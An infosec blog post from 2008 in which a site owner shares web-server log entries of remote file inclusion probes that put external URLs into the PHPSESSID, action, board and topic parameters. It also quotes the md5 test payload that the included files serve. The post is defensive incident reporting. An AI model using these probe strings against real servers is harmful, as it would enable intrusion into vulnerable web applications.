« Tor-node stripping out TLS in SMTP conversations
PHP based IRC botnet, fast-flux of course »

Wierd exploitation attempts

I just noticed some weird HTTP requests on my site. It seems that someone is trying to exploit a remote file inclusion in some software. Normally I wouldn’t blink my eyes on these, but it seems that the vulnerability is in the PHPSESSID variable. I’ve got no idea which software these belong to though. Here are some examples:

These are the requests the attacker made:

125.136.86.51 - - [29/Jan/2008:06:32:06 +0200] “GET / HTTP/1.1″ 200 277 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:07 +0200] “GET /index.php HTTP/1.1″ 302 - “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:08 +0200] “GET /index.php?PHPSESSID=http%3A%2F%2Fwww.<removed>ilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Fuza%2Flaqipu%2F;www HTTP/1.1″ 200 30633 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:09 +0200] “GET /index.php?PHPSESSID=http%3A%2F%2Fwww.<removed>rvice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F;www HTTP/1.1″ 200 30633 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:10 +0200] “GET /wordpress HTTP/1.1″ 301 408 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:11 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27;www HTTP/1.1″ 200 30633 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:12 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=http%3A%2F%2Fwww.<removed>ice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F;board=7.0 HTTP/1.1″ 200 31103 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:13 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=http%3A%2F%2Fwww.<removed>ime.com.mx%2Fgaleria%2Finclude%2Fnokuc%2Fkef%2F;board=7.0 HTTP/1.1″ 200 31103 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
83.150.86.76 - - [29/Jan/2008:06:32:13 +0200] “GET /wordpress/feed/ HTTP/1.1″ 200 14714 “-” “-”
125.136.86.51 - - [29/Jan/2008:06:32:14 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=unread;board=http%3A%2F%2Fwww.<removed>nd.co.uk%2Fscans%2Fyouneedtoselectaplanettoclaimbeforegettinginhere%2Fscanlogs%2Fiwazex%2Fatepec%2F HTTP/1.1″ 200 13467 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:15 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=unread;board=http%3A%2F%2Fwww.<removed>us.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F HTTP/1.1″ 200 13467 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:16 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&board=http%3A%2F%2Fwww.<removed>ft.com%2Fforum%2FThemes%2Frowizah%2Fnisahuc%2F HTTP/1.1″ 200 30633 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:17 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&board=http%3A%2F%2Fwww.<removed>ft.co.uk%2Fforum%2Flovuqo%2Fzil%2F HTTP/1.1″ 200 30633 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:19 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&topic=http%3A%2F%2Fwww.<removed>nd.co.uk%2Fscans%2Fyouneedtoselectaplanettoclaimbeforegettinginhere%2Fscanlogs%2Fiwazex%2Fatepec%2F HTTP/1.1″ 200 30633 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:20 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&topic=http%3A%2F%2Fwww.<removed>ub.it%2Fconcerti%2Fdati%2Folukev%2Forawo%2F HTTP/1.1″ 200 30633 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:21 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=profile;u=http%3A%2F%2Fwww.<removed>site.com%2Fsoeasycasino%2Fixu%2Fxotem%2F HTTP/1.1″ 200 11551 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:22 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=profile;u=http%3A%2F%2Fwww.<removed>me.com.mx%2Fgaleria%2Finclude%2Fnokuc%2Fkef%2F HTTP/1.1″ 200 11551 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:23 +0200] “GET /wordpress/ HTTP/1.1″ 200 18360 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:24 +0200] “GET /index.php?PHPSESSID=9002806458890b6a55ec8d49f2bc0a27&action=unread;board=7.0 HTTP/1.1″ 200 13642 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:25 +0200] “GET /wordpress/2007/03/ HTTP/1.1″ 200 17954 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:26 +0200] “GET /wordpress/2007/02/20/the-saga-of-virut-continues/ HTTP/1.1″ 200 5823 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”
125.136.86.51 - - [29/Jan/2008:06:32:27 +0200] “GET /wordpress/2007/02/20/the-saga-of-virut-continues/feed/ HTTP/1.1″ 200 557 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)”

I removed parts of the domain to prevent further exploitation of those sites. When visititing the URL we get greeted with a text file containing this:

[code]

<?php echo md5("just_a_test");?>

[/code]

I’ve got no idea how widespread this is, and no idea of the affected software.

[edit]

I’m starting to get more and more of these attempts from various ip addresses that all seem to be webservers. I checked a few manually. They had no common softwares installed but rather all the telltale signs of remote file inclusion written all over the site.

This entry was posted on Tuesday, January 29th, 2008 at 7:59 am and is filed under General InfoSec. You can follow any responses to this entry through the RSS 2.0 feed. Responses are currently closed, but you can trackback from your own site.

Comments are closed.

If you want to comment on this article please send e-mail
to authors(_at_)teamfurry.com or go to the forums.

InspectorWordpress has prevented 2 attacks.